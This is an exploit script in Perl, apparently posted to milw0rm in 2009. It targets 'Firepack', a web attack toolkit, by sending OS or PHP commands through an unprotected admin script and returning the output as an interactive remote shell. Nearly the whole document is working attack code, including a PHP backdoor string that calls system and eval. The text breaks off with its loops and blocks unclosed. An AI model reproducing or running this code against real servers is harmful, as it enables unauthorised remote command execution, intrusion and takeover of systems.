# Firepack - Remote Command\Code Execution Exploit
# Firepack is a web atting toolkit often used in 2008, when the most
# versions of it were published. A short time ago i looked though the
# sourcecode and noticed that Vulnerability which can be used
# if the admin doesn't use a .htaccess protection in his admin area.
# WARNING: When accessing the index.php, malware could be executed
# so i recommend to execute it in a virtual environment.
# Username and password are located in config.php in the main folder
Firepack - Remote Command/Code Execution Exploit
Date: 17.02.2009
Vulnerability discovered by: Lidloses_Auge
Exploit coded by: Lidloses_Auge
Greetz to: -=Player=- , Suicide,
g4ms3, enco, Palme, GPM,
karamble, Free-Hack
1) Your enemy
URL (e.g. http://localhost/FirePack/)
2) Weapons
1 = Remote Command Execution (OS Commands)
2 = Remote Code Execution (PHP Commands)
Select the enemy now:
$enemy = <STDIN>;
$enemy = substr($enemy,0,length($enemy)-1);
print "\nChoose your weapon!\n\n\t";
$choice = <STDIN>;
$choice = substr($choice,0,length($choice)-1);
if ($choice == 1 | $choice == 2) {
print "\n>>> Entering the ship!";
use LWP::Simple;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$param[0] = "cmd";
$param[1] = "code";
$param[2] = "system";
$param[3] = "eval";
$code = "<?php if(isset(\$_GET['$param[$choice-1]'])){echo 'fp_$param[$choice-1]1';$param[$choice+1](\$_GET['$param[$choice-1]']);echo 'fp_$param[$choice-1]2';die;} ?>";
$req = HTTP::Request->new(GET => $enemy."index.php");
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if (!($res->is_success)) {
print "\nFailed! Wrong enemy dude?\n";
} else {
print "\nWelcome aboard, warrior! Try some commands ('quit' to exit):";
$splitlen = length("fp_".$param[$choice-1])+1;
$key = "fp_".$param[$choice-1];
while (substr($cmd,0,length($cmd)-1) ne "quit") {
print "\n\n>Do: ";
$cmd = <STDIN>;
if (substr($cmd,0,length($cmd)-1) ne "quit") {
$src = get($enemy."admin/ref.php?$param[$choice-1]=$cmd");
print "\n".substr($src,index($src,$key."1")+$splitlen,index($src,$key."2")-index($src,$key."1")-$splitlen);
} else {
print "\nWanna fight without weapon? No way dude!";
# milw0rm.com [2009-02-18]